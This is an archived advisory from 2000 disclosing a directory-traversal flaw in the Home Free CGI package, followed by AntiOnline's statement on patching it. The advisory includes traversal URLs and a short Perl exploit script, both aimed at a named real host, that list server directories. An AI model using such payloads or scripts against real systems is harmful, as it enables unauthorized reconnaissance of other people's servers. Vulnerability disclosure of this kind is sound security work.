[ http://www.rootshell.com/ ]
k0ad k1d <k0adk1d@hotmail.com>
==============================================================================
#!/bin/csh security advisory
----------------------------
Title : Vulnerabilities in the SolutionScripts.com
Home Free CGI package.
Advisory Ref : csh-adv:04.01.2000-CGI-HomeFree-01
Credits : fzx, omnihil, the guys in !el8
DSKZ, M0D
==============================================================================
Introduction
------------
SolutionScripts.com is a vendor of Perl CGI scripts for all platforms that
support the language (WinNT, Linux, various Unix flavors). Home Free is a
package developed and marketed by SolutionScripts.com, below is an extract
from their website.
"Home Free is the ultimate community building program. Allowing you
to give your visitors a free web site on your server. With complete
control over every aspect of your free web site program, you can
grow page views, revenue and brand awareness for your site."
http://solutionscripts.com/vault/homefree/index.shtml
Home Free is used by many popular websites. It allows users to set up and
maintain their websites through a series of CGI scripts without posing a
threat to system security.
Details
-------
Home Free consists of the following files from an end-user point of view :-
./features.cgi
./new.cgi
./search.cgi
./signup.cgi
./user_files.cgi
./user_formmail.cgi
./user_ftp_import.cgi
./user_gbook.cgi
./user_manage.cgi
./user_pref.cgi
./user_uploads.cgi
./user_wwwboard.cgi
There are also various 'admin' CGI scripts in the package, such as :-
./admin.cgi
./admin_browse.cgi
./admin_cata.cgi
./admin_email.cgi
./admin_features.cgi
./admin_setup.cgi
./admin_update.cgi
Vulnerabilities Identified
--------------------------
./search.cgi
The search.cgi script uses the following input variables :-
letter=any string
cata=any string
perpage=any string
start=any string
boolean=or/and
advanced
This CGI script can be exploited to view directory listings on the host
server. A vulnerability exists because of insufficient bounds checking
of the 'letter' variable when it is parsed by the search.cgi script,
for example :-
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt
The above URL will list the \winnt directory of the host. The
search.cgi
script also seems to read and display the first line of each file
(network.wri, et al). We have been unable to use the search.cgi script
or any of the other scripts in the package to view files to date.
If we had access to the source code of these Perl scripts, I'm sure
that
many security problems would be identified.
You can also exploit the vulnerability to view other directory
listings,
such as the /cgi-bin directory under Apache.
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin
We also took the time in writing a short Perl script to display the
directory listings of vulnerable servers :
--8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip
#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to
list
# directories on the host.
#
# Default server is antionline's, change as appropriate.
#
use IO::Socket;
if ($ARGV[0] eq "") { die "no argument\n"; }
$asoc = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "members.antionline.com",
PeerPort => 80) ||
die "can't connect to host: $!";
select($asoc);
$| = 1;
print $asoc "GET
/cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all
HTTP/1.0\n\n";
while(<$asoc>) {
if ($_ =~ /.+HREF.+TD.+/) {
@parts = split("\"", $_);
$foo = $parts[1];
@parts = split("/", $foo);
print STDOUT $parts[3];
print STDOUT "\n";
}
}
close(ASOC);
--8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip --8<-- snip
Other smaller problems were identified when testing the bounds checking
and
flexibility of the other scripts, such as user_manage.cgi. Without access
to
the source code of the Perl scripts in question, it is very difficult to
know the security implications of such problems. We'll leave that up to
the vendor to look into and patch.
==============================================================================
#!/bin/csh security advisory
----------------------------
Title : Vulnerabilities in the SolutionScripts.com
Home Free CGI package.
Advisory Ref : csh-adv:01.04.2000-CGI-HomeFree-01
Credits : fzx, omnihil, the guys in !el8
DSKZ, M0D
==============================================================================
http://www.antionline.com/cgi-bin/News?type=antionline&date=01-03-2000&story=AObug.news
AntiOnline Status Notice
Tuesday, January 4, 2000 at 17:27:32
by John Vranesevich - Founder of AntiOnline
As part of its policy on releasing any information related to the security of its network, AntiOnline presents the following
statement:
On Tuesday, the popular BugTraq security mail list released an advisory
about the security of "Home Free", a cgi software product produced by
SolutionScripts.com AntiOnline, along with hundreds of other websites, used
the HomeFree software in order to host free "user webpages" on its
members.antionline.com domain (which can be thought of as a geocities-like
interface). The security advisory used the AntiOnline instillation of
HomeFree as an example (we appreciate it) of the vulnerability.
The disclosed vulnerability allowed any user to view the structure of any
directory on the webserver. However, it did not allow any user to view the
contents of, delete, or otherwise modify any file on the server.
AntiOnline had the offending CGIs offline within 3 minutes of the BugTraq
notice being sent out (thanks to custom notification software implemented at
AntiOnline).
AntiOnline notified the makers of the HomeFree Software, and received a
patch from SolutionScript developer Tim Watson within 15 minutes. AntiOnline
is in the process of reviewing the patch, and the integrity of the other
CGIs in the HomeFree package.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
